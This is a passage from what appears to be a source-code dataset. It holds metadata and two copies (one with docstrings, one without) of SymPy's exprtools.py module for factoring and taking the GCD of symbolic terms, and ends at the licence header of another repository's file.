if isinstance(scene_idx[0], (list, tuple, np.ndarray)):
return scene_idx
return self._duplicate_to_list(scene_idx, num)
| true
| true
|
f70b5f2e5d711c4d49dfaaaa08f666f717f97bdc
| 23,143
|
py
|
Python
|
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | 2
|
2015-05-11T12:26:38.000Z
|
2016-08-19T00:11:03.000Z
|
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/exprtools.py
|
goodok/sympy
|
de84ed2139125a755ea7b6ba91d945d9fbbe5ed9
|
[
"BSD-3-Clause"
] | null | null | null |
"""Tools for manipulating of large commutative expressions. """
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
"""
Decompose power into symbolic base and integer exponent.
Examples
========
>>> from sympy.core.exprtools import decompose_power
>>> from sympy.abc import x, y
>>> decompose_power(x)
(x, 1)
>>> decompose_power(x**2)
(x, 2)
>>> decompose_power(x**(2*y))
(x**y, 2)
>>> decompose_power(x**(2*y/3))
(x**(y/3), 2)
"""
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
"""Efficient representation of ``f_1*f_2*...*f_n``. """
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
class Term(object):
"""Efficient representation of ``coeff*(numer/denom)``. """
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
def _gcd_terms(terms, isprimitive=False):
"""Helper function for :func:`gcd_terms`. If `isprimitive` is True then the
call to primitive for an Add will be skipped. This is useful when the
content has already been extrated."""
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
"""
Compute the GCD of ``terms`` and put them together. If ``isprimitive`` is
True the _gcd_terms will not run the primitive method on the terms.
``clear`` controls the removal of integers from the denominator of an Add
expression. When True, all numerical denominator will be cleared; when
False the denominators will be cleared only if all terms had numerical
denominators.
Examples
========
>>> from sympy.core import gcd_terms
>>> from sympy.abc import x, y
>>> gcd_terms((x + 1)**2*y + (x + 1)*y**2)
y*(x + 1)*(x + y + 1)
>>> gcd_terms(x/2 + 1)
(x + 2)/2
>>> gcd_terms(x/2 + 1, clear=False)
x/2 + 1
>>> gcd_terms(x/2 + y/2, clear=False)
(x + y)/2
"""
def mask(terms):
"""replace nc portions of each term with a unique Dummy symbols
and return the replacements to restore them"""
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr: # hence an Add
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
"""Remove common factors from terms in all arguments without
changing the underlying structure of the expr. No expansion or
simplification (and no processing of non-commutatives) is performed.
If radical=True then a radical common to all terms will be factored
out of any Add sub-expressions of the expr.
If clear=False (default) then coefficients will not be separated
from a single Add if they can be distributed to leave one or more
terms with integer coefficients.
Examples
========
>>> from sympy import factor_terms, Symbol, Mul, primitive
>>> from sympy.abc import x, y
>>> factor_terms(x + x*(2 + 4*y)**3)
x*(8*(2*y + 1)**3 + 1)
>>> A = Symbol('A', commutative=False)
>>> factor_terms(x*A + x*A + x*y*A)
x*(y*A + 2*A)
When clear is False, a fraction will only appear factored out of an
Add expression if all terms of the Add have coefficients that are
fractions:
>>> factor_terms(x/2 + 1, clear=False)
x/2 + 1
>>> factor_terms(x/2 + 1, clear=True)
(x + 2)/2
This only applies when there is a single Add that the coefficient
multiplies:
>>> factor_terms(x*y/2 + y, clear=True)
y*(x + 2)/2
>>> factor_terms(x*y/2 + y, clear=False) == _
True
"""
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args) # gcd_terms will fix up ordering
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
"""Return ``eq`` with non-commutative objects replaced with dummy
symbols. A dictionary that can be used to restore the original
values is returned: if it is None, the expression is
noncommutative and cannot be made commutative. The third value
returned is a list of any non-commutative symbols that appeared
in the equation.
Notes
=====
All commutative objects (other than Symbol) will be replaced;
if the only non-commutative obects are Symbols, if there is only
1 Symbol, it will be replaced; if there are more than one then
they will not be replaced; the calling routine should handle
replacements in this case since some care must be taken to keep
track of the ordering of symbols when they occur within Muls.
Examples
========
>>> from sympy.physics.secondquant import Commutator, NO, F, Fd
>>> from sympy import Dummy, symbols
>>> from sympy.abc import x, y
>>> from sympy.core.exprtools import _mask_nc
>>> A, B, C = symbols('A,B,C', commutative=False)
>>> Dummy._count = 0 # reset for doctest purposes
>>> _mask_nc(A**2 - x**2)
(_0**2 - x**2, {_0: A}, [])
>>> _mask_nc(A**2 - B**2)
(A**2 - B**2, None, [A, B])
>>> _mask_nc(1 + x*Commutator(A, B))
(_1*x + 1, {_1: Commutator(A, B)}, [A, B])
>>> _mask_nc(NO(Fd(x)*F(y)))
(_2, {_2: NO(CreateFermion(x)*AnnihilateFermion(y))}, [])
"""
expr = eq
if expr.is_commutative:
return eq, {}, []
# if there is only one nc symbol, it can be factored regularly but
# polys is going to complain, so replace it with a dummy
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# even though the noncommutative symbol may be gone, the expression
# might still appear noncommutative; if it's a non-elementary object
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip() # don't go any further
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
"""Return the factored form of ``expr`` while handling non-commutative
expressions.
**examples**
>>> from sympy.core.exprtools import factor_nc
>>> from sympy import Symbol
>>> from sympy.abc import x
>>> A = Symbol('A', commutative=False)
>>> B = Symbol('B', commutative=False)
>>> factor_nc((x**2 + 2*A*x + A**2).expand())
(x + A)**2
>>> factor_nc(((x + A)*(x + B)).expand())
(x + A)*(x + B)
"""
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
# a factor of -1, e.g. A**2 - B**2) -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
| 31.190027
| 98
| 0.535065
|
from sympy.core.add import Add
from sympy.core.compatibility import iterable
from sympy.core.mul import Mul, _keep_coeff
from sympy.core.power import Pow
from sympy.core.basic import Basic
from sympy.core.expr import Expr
from sympy.core.function import expand_mul
from sympy.core.sympify import sympify
from sympy.core.numbers import Rational, Integer
from sympy.core.singleton import S
from sympy.core.symbol import Dummy
from sympy.core.coreerrors import NonCommutativeExpression
from sympy.core.containers import Tuple
from sympy.utilities import default_sort_key
from sympy.utilities.iterables import (common_prefix, common_suffix,
preorder_traversal, variations)
def decompose_power(expr):
base, exp = expr.as_base_exp()
if exp.is_Number:
if exp.is_Rational:
if not exp.is_Integer:
base = Pow(base, Rational(1, exp.q))
exp = exp.p
else:
base, exp = expr, 1
else:
exp, tail = exp.as_coeff_Mul(rational=True)
if exp is S.NegativeOne:
base, exp = Pow(base, tail), -1
elif exp is not S.One:
tail = _keep_coeff(Rational(1, exp.q), tail)
base, exp = Pow(base, tail), exp.p
else:
base, exp = expr, 1
return base, exp
class Factors(object):
__slots__ = ['factors', 'gens']
def __init__(self, factors=None):
if factors is None:
factors = {}
self.factors = factors
self.gens = frozenset(factors.keys())
def __hash__(self):
return hash((tuple(self.factors), self.gens))
def __repr__(self):
return "Factors(%s)" % self.factors
def as_expr(self):
args = []
for factor, exp in self.factors.iteritems():
if exp != 1:
b, e = factor.as_base_exp()
e = _keep_coeff(Integer(exp), e)
args.append(b**e)
else:
args.append(factor)
return Mul(*args)
def normal(self, other):
self_factors = dict(self.factors)
other_factors = dict(other.factors)
for factor, self_exp in self.factors.iteritems():
try:
other_exp = other.factors[factor]
except KeyError:
continue
exp = self_exp - other_exp
if not exp:
del self_factors[factor]
del other_factors[factor]
else:
if exp > 0:
self_factors[factor] = exp
del other_factors[factor]
else:
del self_factors[factor]
other_factors[factor] = -exp
return Factors(self_factors), Factors(other_factors)
def mul(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = factors[factor] + exp
if not exp:
del factors[factor]
continue
factors[factor] = exp
return Factors(factors)
def div(self, other):
quo, rem = dict(self.factors), {}
for factor, exp in other.factors.iteritems():
if factor in quo:
exp = quo[factor] - exp
if exp <= 0:
del quo[factor]
if exp >= 0:
if exp:
quo[factor] = exp
continue
exp = -exp
rem[factor] = exp
return Factors(quo), Factors(rem)
def quo(self, other):
return self.div(other)[0]
def rem(self, other):
return self.div(other)[1]
def pow(self, other):
if type(other) is int and other >= 0:
factors = {}
if other:
for factor, exp in self.factors.iteritems():
factors[factor] = exp*other
return Factors(factors)
else:
raise ValueError("expected non-negative integer, got %s" % other)
def gcd(self, other):
factors = {}
for factor, exp in self.factors.iteritems():
if factor in other.factors:
exp = min(exp, other.factors[factor])
factors[factor] = exp
return Factors(factors)
def lcm(self, other):
factors = dict(self.factors)
for factor, exp in other.factors.iteritems():
if factor in factors:
exp = max(exp, factors[factor])
factors[factor] = exp
return Factors(factors)
def __mul__(self, other):
if isinstance(other, Factors):
return self.mul(other)
else:
return NotImplemented
def __divmod__(self, other):
if isinstance(other, Factors):
return self.div(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Factors):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __mod__(self, other):
if isinstance(other, Factors):
return self.rem(other)
else:
return NotImplemented
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return self.factors == other.factors
def __ne__(self, other):
return not self.__eq__(other)
class Term(object):
__slots__ = ['coeff', 'numer', 'denom']
def __init__(self, term, numer=None, denom=None):
if numer is None and denom is None:
if not term.is_commutative:
raise NonCommutativeExpression('commutative expression expected')
coeff, factors = term.as_coeff_mul()
numer, denom = {}, {}
for factor in factors:
base, exp = decompose_power(factor)
if base.is_Add:
cont, base = base.primitive()
coeff *= cont**exp
if exp > 0:
numer[base] = exp
else:
denom[base] = -exp
numer = Factors(numer)
denom = Factors(denom)
else:
coeff = term
if numer is None:
numer = Factors()
if denom is None:
denom = Factors()
self.coeff = coeff
self.numer = numer
self.denom = denom
def __hash__(self):
return hash((self.coeff, self.numer, self.denom))
def __repr__(self):
return "Term(%s, %s, %s)" % (self.coeff, self.numer, self.denom)
def as_expr(self):
return self.coeff*(self.numer.as_expr()/self.denom.as_expr())
def mul(self, other):
coeff = self.coeff*other.coeff
numer = self.numer.mul(other.numer)
denom = self.denom.mul(other.denom)
numer, denom = numer.normal(denom)
return Term(coeff, numer, denom)
def inv(self):
return Term(1/self.coeff, self.denom, self.numer)
def quo(self, other):
return self.mul(other.inv())
def pow(self, other):
if other < 0:
return self.inv().pow(-other)
else:
return Term(self.coeff ** other,
self.numer.pow(other),
self.denom.pow(other))
def gcd(self, other):
return Term(self.coeff.gcd(other.coeff),
self.numer.gcd(other.numer),
self.denom.gcd(other.denom))
def lcm(self, other):
return Term(self.coeff.lcm(other.coeff),
self.numer.lcm(other.numer),
self.denom.lcm(other.denom))
def __mul__(self, other):
if isinstance(other, Term):
return self.mul(other)
else:
return NotImplemented
def __div__(self, other):
if isinstance(other, Term):
return self.quo(other)
else:
return NotImplemented
__truediv__ = __div__
def __pow__(self, other):
if type(other) is int:
return self.pow(other)
else:
return NotImplemented
def __eq__(self, other):
return (self.coeff == other.coeff and
self.numer == other.numer and
self.denom == other.denom)
def __ne__(self, other):
return not self.__eq__(other)
def _gcd_terms(terms, isprimitive=False):
if isinstance(terms, Basic) and not isinstance(terms, Tuple):
terms = Add.make_args(terms)
if len(terms) <= 1:
if not terms:
return S.Zero, S.Zero, S.One
else:
return terms[0], S.One, S.One
terms = map(Term, terms)
cont = terms[0]
for term in terms[1:]:
cont = cont.gcd(term)
for i, term in enumerate(terms):
terms[i] = term.quo(cont)
denom = terms[0].denom
for term in terms[1:]:
denom = denom.lcm(term.denom)
numers = []
for term in terms:
numer = term.numer.mul(denom.quo(term.denom))
numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
def mask(terms):
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr:
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args)
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
expr = eq
if expr.is_commutative:
return eq, {}, []
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip()
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
# a factor of -1, e.g. A**2 - B**2) -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
| true
| true
|
f70b5f4294a4d2ab507a4a6f16e55b064f90a04c
| 4,342
|
py
|
Python
|
sawtooth_identity/processor/main.py
|
STYJ/Sawtooth-Sample-Identity-TP
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | 1
|
2018-08-14T06:58:46.000Z
|
2018-08-14T06:58:46.000Z
|
sawtooth_identity/processor/main.py
|
STYJ/sawtooth-identity-tp
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | null | null | null |
sawtooth_identity/processor/main.py
|
STYJ/sawtooth-identity-tp
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
